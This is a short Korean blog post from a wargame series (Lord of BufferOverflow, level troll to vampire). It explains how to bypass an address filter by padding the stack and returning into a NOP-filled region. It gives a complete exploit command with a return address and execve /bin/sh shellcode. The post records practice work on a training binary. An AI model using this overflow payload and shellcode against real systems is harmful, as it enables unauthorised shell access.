Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | |
7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | 23 | 24 | 25 | 26 | 27 |
28 | 29 | 30 |
Tags
- codegate2017
- CVE
- pwntools
- CODEGATE2018
- doorlock
- node.js
- module
- Git
- 도메인 https
- Codegate
- xlsx
- NGINX
- blueborne
- node
- https설정
- 코드게이트 주니어
- openctf
- shellcraft
- lob
- npm
- https
- Branch
- Hacking
- BLUETOOTH
- gogs
- gogs private git
- pwnable
- 코드게이트
- 코드게이트2017
- 노드 엑셀
Archives
- Today
- Total
고졸백수해킹일기
troll->vampire 본문
주소 필터링으로 0x??ff????를 쓸수가 없다.
메모리는 거꾸로 자라는 특성을 이용하여 많은 nop를 채워주고 그쪽 메모리로 ret을 돌려 쉘을 딴다
./vampire `python -c 'print "\x90"*44+"\x9c\x76\xfe\xbf"'` `python -c 'print "A"*99999+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
music world
music world
'Wargame > lob' 카테고리의 다른 글
skeleton->golem (0) | 2018.01.30 |
---|---|
vampire->skeleton (0) | 2018.01.28 |
orge->troll (0) | 2018.01.26 |
darkelf->orge (0) | 2018.01.26 |
wolfman->darkelf (0) | 2018.01.26 |